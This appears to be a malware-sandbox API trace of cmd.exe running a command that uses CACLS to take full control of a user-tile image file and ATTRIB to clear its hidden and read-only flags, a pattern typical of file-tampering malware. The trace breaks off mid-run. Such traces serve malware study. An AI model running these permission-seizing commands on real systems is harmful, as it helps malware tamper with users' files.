returned 0x3 [0186.007] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.007] GetEnvironmentStringsW () returned 0x290308* [0186.008] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.008] GetEnvironmentStringsW () returned 0x290308* [0186.008] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eb74 | out: phkResult=0x20eb74*=0x40) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0xb8, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x0, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegCloseKey (hKey=0x40) returned 0x0 [0186.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eb74 | out: phkResult=0x20eb74*=0x40) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x0, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegCloseKey (hKey=0x40) returned 0x0 [0186.008] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.009] srand (_Seed=0x5b886394) [0186.009] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" [0186.009] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" [0186.009] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.009] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.009] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.009] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.009] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.009] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.009] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.009] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.010] GetEnvironmentStringsW () returned 0x292458* [0186.010] FreeEnvironmentStringsW (penv=0x292458) returned 1 [0186.010] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.010] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.010] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.010] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.010] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.010] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.010] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.010] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.010] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.010] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.010] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f940 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.010] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f940, lpFilePart=0x20f93c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f93c*="Desktop") returned 0x18 [0186.010] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.010] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.010] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.011] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.011] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.011] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.011] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.011] GetEnvironmentStringsW () returned 0x290308* [0186.011] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.011] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.011] GetConsoleOutputCP () returned 0x1b5 [0186.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.011] GetUserDefaultLCID () returned 0x409 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fa80, cchData=128 | out: lpLCData="0") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fa80, cchData=128 | out: lpLCData="0") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fa80, cchData=128 | out: lpLCData="1") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.012] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.013] GetConsoleTitleW (in: lpConsoleTitle=0x2809b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.014] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.014] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.014] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.014] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.015] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.015] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.015] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.015] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.017] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.017] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.017] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.017] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.017] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.017] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.017] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.019] GetConsoleTitleW (in: lpConsoleTitle=0x20f714, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.020] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.020] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.020] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.020] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.020] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.020] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.020] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.020] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.020] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.020] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.020] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.020] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.020] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.020] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.020] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.021] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.021] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.021] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.021] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.021] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.021] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.021] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.021] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.021] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.021] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.022] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.022] SetErrorMode (uMode=0x0) returned 0x0 [0186.022] SetErrorMode (uMode=0x1) returned 0x0 [0186.022] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x291e98, lpFilePart=0x20f234 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f234*="Desktop") returned 0x18 [0186.022] SetErrorMode (uMode=0x0) returned 0x1 [0186.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.022] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.027] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x292180 [0186.028] FindClose (in: hFindFile=0x292180 | out: hFindFile=0x292180) returned 1 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x292180 [0186.029] FindClose (in: hFindFile=0x292180 | out: hFindFile=0x292180) returned 1 [0186.029] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.029] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.029] GetConsoleTitleW (in: lpConsoleTitle=0x20f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.029] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f330, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f3f8 | out: lpAttributeList=0x20f330, lpSize=0x20f3f8) returned 1 [0186.029] UpdateProcThreadAttribute (in: lpAttributeList=0x20f330, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f3f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f330, lpPreviousValue=0x0) returned 1 [0186.029] GetStartupInfoW (in: lpStartupInfo=0x20f2ec | out: lpStartupInfo=0x20f2ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.029] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.030] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f38c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f3d8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f3d8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xee8, dwThreadId=0xf04)) returned 1 [0186.032] CloseHandle (hObject=0x4c) returned 1 [0186.032] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.032] GetEnvironmentStringsW () returned 0x290308* [0186.032] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.033] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.063] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f2cc | out: lpExitCode=0x20f2cc*=0x0) returned 1 [0186.063] CloseHandle (hObject=0x50) returned 1 [0186.063] _vsnwprintf (in: _Buffer=0x20f414, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f2d8 | out: _Buffer="00000000") returned 8 [0186.063] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.063] GetEnvironmentStringsW () returned 0x292410* [0186.063] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.063] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.063] GetEnvironmentStringsW () returned 0x292410* [0186.063] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.063] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f330 | out: lpAttributeList=0x20f330) [0186.063] GetConsoleTitleW (in: lpConsoleTitle=0x20f714, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.064] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.064] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.064] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.064] GetLastError () returned 0x2 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.064] GetLastError () returned 0x2 [0186.064] 